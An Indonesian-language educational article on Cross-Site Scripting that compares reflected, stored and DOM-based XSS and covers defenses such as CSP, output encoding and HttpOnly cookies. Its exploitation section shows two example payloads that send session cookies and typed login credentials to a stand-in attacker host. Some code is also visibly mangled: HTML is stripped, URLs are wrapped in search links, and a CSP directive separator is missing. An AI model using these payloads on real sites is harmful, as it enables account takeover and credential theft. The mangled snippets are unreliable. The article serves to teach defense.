Cross-Site Scripting (XSS) merupakan salah satu kerentanan keamanan web paling klasik sekaligus paling persisten dalam sejarah keamanan siber. Meskipun industri keamanan telah berkembang pesat dengan munculnya berbagai framework modern dan alat pemindai otomatis, XSS secara konsisten tetap berada di jajaran OWASP Top 10 hingga pembaruan tahun 2021 (di mana ia dikategorikan ke dalam rumpun A03:2021-Injection).

Pertanyaan mendasar yang sering muncul adalah: mengapa kerentanan yang telah diidentifikasi sejak era awal web ini masih sangat sulit dimusnahkan? Jawabannya terletak pada dua faktor utama: arsitektur web modern dan kompleksitas konteks eksekusi data.

Web kontemporer tidak lagi sekadar dokumen statis, melainkan aplikasi dinamis yang sangat bergantung pada input pengguna, integrasi pihak ketiga (API), dan manipulasi Document Object Model (DOM) di sisi klien (client-side). Setiap kali aplikasi web gagal membedakan antara instruksi kode yang valid dan data yang dimasukkan oleh pengguna, celah XSS tercipta. Eksploitasi yang sukses memungkinkan penyerang mengeksekusi script berbahaya (biasanya JavaScript) di dalam browser korban, melompati proteksi Same-Origin Policy (SOP), dan bertindak atas nama pengguna yang sah.

— -

Perbandingan Teknis: Reflected vs Stored vs DOM-based XSS

Untuk membangun strategi pertahanan yang efektif, kita harus memahami taksonomi XSS. Secara garis besar, XSS dibagi menjadi tiga kategori utama berdasarkan jalur transmisi payload dan lokasi eksekusinya.

  1. Reflected XSS (Non-Persistent)
  2. Reflected XSS terjadi ketika payload berbahaya yang dikirimkan oleh pengguna langsung dipantulkan (reflected) kembali oleh server dalam bentuk respon HTTP tanpa proses teknik sanitasi atau encoding yang memadai. Sifat dari serangan ini adalah non-persisten; payload tidak disimpan di dalam database server.
  • Vektor Serangan: Penyerang biasanya merekayasa URL yang mengandung script berbahaya (misalnya melalui parameter pencarian atau form login) dan menjebak korban untuk mengkliknya melalui teknik phishing atau social engineering.

2. Stored XSS (Persistent)

Stored XSS dianggap jauh lebih berbahaya daripada Reflected XSS karena sifatnya yang persisten. Dalam skenario ini, payload berbahaya yang dikirimkan penyerang berhasil lolos dari validasi server dan disimpan secara permanen di dalam penyimpanan data aplikasi (seperti database, log server, forum diskusi, atau komentar).

  • Vektor Serangan: Setiap kali pengguna lain (korban) mengakses halaman yang menampilkan data korup tersebut, script berbahaya akan otomatis terunduh dan dieksekusi oleh browser mereka. Satu payload tunggal di sini berpotensi menginfeksi ribuan pengguna secara pasif.

3. DOM-based XSS

Berbeda dengan dua jenis sebelumnya yang melibatkan interaksi langsung dengan siklus respon-permintaan (request-response) server, DOM-based XSS sepenuhnya terjadi di dalam lingkungan browser (client-side). Kerentanan ini lahir ketika JavaScript di sisi klien mengambil data dari sumber yang dapat dikontrol oleh pengguna (sedikit dikenal sebagai Source) dan meneruskannya ke fungsi eksekusi yang tidak aman (disebut sebagai Sink).

  • Vektor Serangan: Payload tidak pernah menyentuh server backend dan tidak mengubah struktur kode HTML yang dikirim oleh server; alih-alih, ia langsung memodifikasi susunan tata letak halaman yang sedang berjalan di memori browser korban.

Berikut adalah tabel perbandingan komprehensif untuk membedakan ketiga jenis XSS tersebut secara teknis dan strategis:

| Karakteristik | Reflected XSS | Stored XSS | DOM-based XSS |

| — - | — - | — - | — - |

| Sifat Penyimpanan | Non-Persistent (Sementara) | Persistent (Permanen di DB/Log) | Non-Persistent (Di memori browser) |

| Lokasi Eksekusi | Browser Korban | Browser Korban | Browser Korban |

| Keterlibatan Server | Memproses input dan memantulkannya dalam HTML | Menyimpan payload ke dalam database/file | Seringkali tidak tahu sama sekali (Payload diproses di client) |

| Sumber Utama (Source) | Parameter URL (GET) atau Body Form (POST) | Form Input, Upload File, API internal | location.hash, document.URL, referrer |

| Titik Eksekusi (Sink) | Output HTML langsung dari server | Output HTML dari database ke halaman web | eval(), innerHTML, document.write() |

| Metode Deteksi Utama | WAF, Scanner DAST tradisional | Scanner SAST (Backend), Pentest manual | Analisis tatanan JS statis, Linters, Pemantauan DOM runtime |

— -

Mengapa DOM-based XSS Lebih Sulit Dideteksi dan Dimitigasi?

Dari ketiga jenis tersebut, DOM-based XSS menghadirkan tantangan paling rumit bagi tim keamanan siber. Ada beberapa alasan mendalam mengapa jenis ini sangat sulit dimitigasi:

  1. Invisibilitas di Sisi Server: Pada Reflected dan Stored XSS, string payload (seperti alert(1)) mengalir melalui lalu lintas HTTP menuju server. Akibatnya, Web Application Firewall (WAF) atau sistem deteksi intrusi (IDS) di sisi server dapat dengan mudah memotong string mencurigakan tersebut. Namun, pada DOM-based XSS, payload sering kali diletakkan setelah tanda pagar (#) di URL (dikenal sebagai URL fragment identifier). Berdasarkan spesifikasi RFC 3986, fragmen setelah tanda # tidak pernah dikirimkan oleh browser ke server. Akibatnya, server dan WAF sama sekali buta terhadap kehadiran payload tersebut.
  2. Keterbatasan Pemindaian Statis Tradisional: Alat Static Application Security Testing (SAST) tradisional yang memindai kode backend (seperti PHP, Java, atau Python) tidak akan menemukan celah ini karena kodenya bersih di sisi server. Pemindaian harus dilakukan pada logika eksekusi JavaScript yang sangat dinamis di sisi frontend.
  3. Kompleksitas Aliran Data (Data Flow Analysis): Untuk mendeteksi DOM XSS, sistem harus melacak alur data dari source ke sink melalui puluhan file JavaScript, framework modern (seperti React, Vue, atau Angular), serta pustaka pihak ketiga. Jika sebuah aplikasi memanipulasi string di tengah jalan, pelacakan otomatis sering kali menghasilkan false positive atau justru false negative.

— -

Skenario Eksploitasi: Session Hijacking & Credential Theft

Dampak dari keberhasilan eksploitasi XSS bisa sangat merusak. Dua skenario paling umum dan mematikan adalah pembajakan sesi (session hijacking) dan pencurian kredensial (credential theft).

Skenario A: Session Hijacking (Pembajakan Sesi)

Banyak aplikasi web mengandalkan Session Cookies untuk mengautentikasi pengguna setelah mereka login. Jika aplikasi rentan terhadap XSS, penyerang dapat menyuntikkan script pendek yang dirancang untuk mengakses objek document.cookie.

Contoh Payload Session Hijacking:

new Image().src = "[http://attacker-evilsite.com/log?cookie=](https://www.google.com/search?q=http://attacker-evilsite.com/log%3Fcookie%3D)" + encodeURIComponent(document.cookie);

Kronologi Serangan:

  1. Penyerang menyisipkan kode di atas ke dalam kolom komentar (Stored XSS).
  2. Ketika Administrator melihat komentar tersebut, browser Admin secara otomatis mengeksekusi kode tersebut.
  3. Script membuat objek gambar tak terlihat dan mengirimkan cookie sesi Admin ke server milik penyerang.
  4. Penyerang menyalin cookie tersebut ke browser mereka sendiri, melewati halaman login, dan langsung mendapatkan hak akses penuh sebagai Administrator.

Skenario B: Credential Theft melalui Phishing In-Page

XSS memungkinkan penyerang memanipulasi tampilan visual halaman web secara total melalui manipulasi DOM. Penyerang tidak perlu mengarahkan korban ke situs palsu; mereka bisa membuat form login palsu langsung di dalam situs resmi yang sah.

Contoh Payload Pembuatan Form Palsu:

document.body.innerHTML = 'Sesi Anda telah berakhir. Silakan login kembali:

Login'

window.sendCredentials = function() { var u = document.getElementById('username').value; var p = document.getElementById('password').value; fetch('[https://attacker-evilsite.com/steal?u=](https://www.google.com/search?q=https://attacker-evilsite.com/steal%3Fu%3D)' + u + '&p=' + p); };

Karena URL di address bar tetap menunjukkan alamat situs resmi yang tepercaya (misalnya, [https://bankresmi.com](https://www.google.com/search?q=https://bankresmi.com)), korban tidak akan menaruh curiga dan akan memasukkan username serta password mereka, yang kemudian langsung dikirimkan ke penyerang.

— -

Peran Security Headers sebagai Mitigasi Utama (Fokus pada CSP)

Ketika kode aplikasi gagal menyaring input, Security Headers yang dikirimkan oleh server ke browser bertindak sebagai garis pertahanan kedua yang sangat kokoh.

Content Security Policy (CSP)

CSP adalah mekanisme keamanan berbasis HTTP header yang memungkinkan pengelola situs web membatasi sumber daya (seperti JavaScript, CSS, Gambar) yang diizinkan untuk dimuat dan dieksekusi oleh browser. CSP secara efektif memandulkan XSS meskipun penyerang berhasil menyuntikkan script berbahaya.

Jika penyerang menyuntikkan alert(1) (dikenal sebagai inline script), browser secara default akan mengeksekusinya. Namun, dengan menerapkan CSP yang ketat, browser akan menolak mengeksekusi script tersebut.

Contoh Header CSP yang Kokoh:

Content-Security-Policy: default-src 'self' script-src 'self' [https://trustedscripts.com](https://www.google.com/search?q=https://trustedscripts.com); object-src 'none'

Analisis Komponen CSP:

  • default-src 'self': Hanya mengizinkan pemuatan aset yang berasal dari domain yang sama dengan aplikasi.
  • * script-src 'self' [https://trustedscripts.com](https://www.google.com/search?q=https://trustedscripts.com): Melarang keras penggunaan inline script (seperti. langsung di HTML) dan penggunaan fungsi berbahaya seperti eval(). JavaScript hanya boleh dimuat dari file eksternal yang berada di domain sendiri atau domain tepercaya yang didaftarkan.
  • * object-src 'none': Mematikan dukungan untuk plugin berbahaya seperti Flash atau Java Applets.

X-Content-Type-Options

Header mitigasi penting lainnya adalah:

X-Content-Type-Options: nosniff

Header ini memaksa browser untuk mematuhi tipe MIME (Multipurpose Internet Mail Extensions) yang dikirimkan oleh server. Tanpa header ini, browser mungkin melakukan MIME-sniffing, yaitu mencoba mengeksekusi file teks biasa atau gambar yang diunggah oleh pengguna (yang ternyata berisi payload XSS) seolah-olah file tersebut adalah JavaScript.

— -

Teknik Output Encoding Berdasarkan Konteks

Sanitasi input (membersihkan input) saja tidak pernah cukup, karena karakter yang aman di satu tempat bisa menjadi instruksi mematikan di tempat lain. Oleh karena itu, Context-Aware Output Encoding adalah standar emas dalam pemrograman defensif melawan XSS. Kita harus mengubah karakter khusus menjadi bentuk entitas yang aman sebelum merendernya ke browser.

  1. Konteks HTML Body
  2. Digunakan ketika data dimasukkan di antara tag HTML standar (misalnya [DATA DI SINI]).
  • Karakter yang harus di-encode:
  • * < menjadi <
  • * > menjadi >
  • & menjadi &
  • * " menjadi "
  • * ' menjadi '

2. Konteks Atribut HTML

Digunakan ketika data dimasukkan ke dalam nilai atribut (misalnya ). Jika data tidak di-encode, penyerang bisa memasukkan karakter " untuk menutup atribut lebih cepat dan menambahkan event handler baru seperti onmouseover=alert(1).

  • Aturan: Lakukan encoding alphanumeric penuh (kecuali karakter yang benar-benar aman) atau pastikan nilai atribut selalu dibungkus oleh tanda kutip ganda dan encode karakter kutip tersebut.

3. Konteks JavaScript

Digunakan ketika data dimasukkan ke dalam blok script dinamis di sisi klien (misalnya. var username = '[DATA DI SINI]' ).

  • Aturan: Karakter seperti tanda kutip, backslash (), dan karakter kontrol harus diubah menjadi format escape Unicode (misalnya, " menjadi \u0022). Ini mencegah penyerang keluar dari variabel string JavaScript.

4. Konteks URL

Digunakan ketika data menjadi bagian dari parameter query tautan (misalnya `).

  • Aturan: Gunakan fungsi penanganan komponen URL standar seperti encodeURIComponent() di JavaScript untuk memastikan semua karakter non-alfanumerik diubah menjadi format persen (percent-encoding).

Kesimpulan dan Rekomendasi

Cross-Site Scripting tetap menjadi ancaman nyata karena evolusi teknologi web yang makin kompleks menuntut penanganan data yang makin dinamis. DOM-based XSS, secara khusus, memerlukan perhatian ekstra karena kemampuannya bersembunyi dari deteksi tradisional berbasis server.

Untuk mengamankan aplikasi web secara menyeluruh dari ancaman XSS, organisasi dan pengembang wajib menerapkan strategi pertahanan berlapis (Defense-in-Depth):

  1. Gunakan Framework Modern Secara Benar: Framework seperti React dan Angular secara otomatis melakukan kontekstual encoding saat merender data. Hindari penggunaan fungsi bypass seperti dangerouslySetInnerHTML di React kecuali benar-benar darurat dan datanya telah disanitasi menggunakan pustaka teruji seperti DOMPurify.
  2. Terapkan CSP Ketat sejak Awal: Jangan menganggap CSP sebagai opsi tambahan. Integrasikan kebijakan CSP bebas inline-script sejak fase awal arsitektur aplikasi dibangun.
  3. Gunakan Atribut Secure pada Cookies: Pastikan semua session cookies dikonfigurasi dengan flag HttpOnly. Flag ini secara mutlak memblokir JavaScript untuk membaca cookie tersebut, sehingga memitigasi risiko Session Hijacking secara instan.
  4. Audit dan Pemindaian Berkelanjutan: Lakukan analisis kode statis (SAST) yang fokus pada keamanan JavaScript frontend, dikombinasikan dengan pemindaian dinamis (DAST) untuk mendeteksi anomali pada visualisasi DOM secara berkala.

Referensi

  1. OWASP Foundation. (2021). OWASP Top 10:2021 — The Critical Application Security Risks. OWASP.org.
  2. Hydara, I., Sultan, A. B. M., Zulzalil, H., & Admodisastro, N. (2015). Current state of research on cross-site scripting (XSS) testing: A systematic mapping study. Journal of Systems and Software, 101, 193–212.
  3. Melicher, W., Anupam, A., Das, S., Sharif, M., Bauer, L., & Reiter, M. K. (2021). Shielding Applications from DOM-based Cross-Site Scripting. Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security, 1102–1116.
  4. Stamm, S., Sterne, B., & Markham, G. (2010). Protecting browsers from Cross-Site Scripting with Content Security Policy. Proceedings of the 19th International Conference on World Wide Web, 1167–1168.
  5. Kern, C. (2014). Preventing Capability Leaks in Secure JavaScript Subsets via Context-Aware Output Encoding. IEEE Security & Privacy, 12(4), 45–52.